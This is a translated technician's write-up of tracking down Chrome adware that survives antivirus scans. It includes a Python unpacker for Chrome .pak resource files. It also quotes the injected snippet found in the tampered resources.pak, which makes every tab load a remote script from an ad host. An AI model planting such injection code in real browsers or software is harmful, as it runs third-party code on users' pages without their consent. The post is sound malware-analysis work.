There is a new type of adware, which is embedded in the browser itself.

Another computer with a complaint about advertising in the browser - as usual, according to the user, nothing started, but the fact is - advertising climbs almost every site from all slots and search queries are replaced. Usually, most of these problems are solved immediately in five minutes using AntiSMS , then the program operation log is checked and, if necessary, tails such as third-party extensions in browsers are cleared, but not in this case. None of the usual means helped immediately, even antiviruses did not see any problems in the system, and therefore it became interesting - where did the advertising come from?

To save time before manual work, the system was quickly checked through AVZ, Dr.Web CureIt! and Kaspersky Virus Removal Tool - all reported on the cleanliness of the system, while the advertisement was shown against the background of their work. Which is typical, all other browsers were removed in the system, only Google Chrome remained, and new methods of infection are not common, so suspicion fell on it last.

First of all, an advertising module from the company Express Find was found with the same legal digital signature of April 8, quite fresh. He used three autorun sites at the same time, but after it was removed, ads miraculously continued to appear. Further investigation revealed that it remains even when creating a new profile. It used to be that adware settled there, but here the developers decided to show creativity so that the advertisement would accompany the user with any profile and under any account.

Further the folder in which Google Chrome was installed was investigated. Everything looks good - all files are digitally signed, nothing unusual. However, to check the folder was renamed and immediately installed a new chrome of the same version. Then it turned out that the resources.pak file is different from the original one and the problem is here. Resources were immediately replaced for verification and everything was confirmed - the culprit was found. A quick search for unpacking resources showed the following python script:
')

import collections import struct import sys def ReadFile(filename, encoding): mode = 'rb' if encoding == 0 else 'rU' with open(filename, mode) as f: data = f.read() if encoding not in (0, 1): data = data.decode(encoding) return data PACK_FILE_VERSION = 4 HEADER_LENGTH = 2 * 4 + 1 # Two uint32s. (file version, number of entries) and # one uint8 (encoding of text resources) def UnpackDataPack(input_file): """Reads a data pack file and returns a dictionary.""" data = ReadFile(input_file, 0) original_data = data # Read the header. version, num_entries, encoding = struct.unpack("<IIB", data[:HEADER_LENGTH]) if version != PACK_FILE_VERSION: print "Wrong file version in ", input_file raise WrongFileVersion resources = {} if num_entries == 0: return DataPackContents(resources, encoding) # Read the index and data. data = data[HEADER_LENGTH:] kIndexEntrySize = 2 + 4 # Each entry is a uint16 and a uint32. for _ in range(num_entries): id, offset = struct.unpack("<HI", data[:kIndexEntrySize]) data = data[kIndexEntrySize:] next_id, next_offset = struct.unpack("<HI", data[:kIndexEntrySize]) resources[id] = original_data[offset:next_offset] filetype = 'bin' fileheader = ''.join(original_data[offset:offset+1]) print ord(fileheader[0]) if fileheader == '<': filetype = 'html' if fileheader == '\x89': filetype = 'png' elif fileheader == '/': filetype = 'js' of = open('{0}.{1}'.format(id,filetype),'wb') of.write(original_data[offset:next_offset]) of.close() def main(): if len(sys.argv) > 1: UnpackDataPack(sys.argv[1]) if __name__ == '__main__': main() 

He successfully unpacked two versions of resources, and after comparing, it turned out that the following block was added to the beginning of one of the adware scripts:

 chrome.tabs.onUpdated.addListener( function(tabId,changeInfo,tab){ chrome.tabs.executeScript(tabId,{code:" if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://expressfind-a.akamaihd.net/ExpressFind/cr?t=BLGC&g=ca4874d9-0a3e-4215-9772-67fb5ba1c08a'; document.head.appendChild(scr);} "})}); 

Thus, the current site via https with a legal digital signature loads ads and successfully bypasses antiviruses. A new method of implementation allows the method to work even after the complete removal of adware from the system.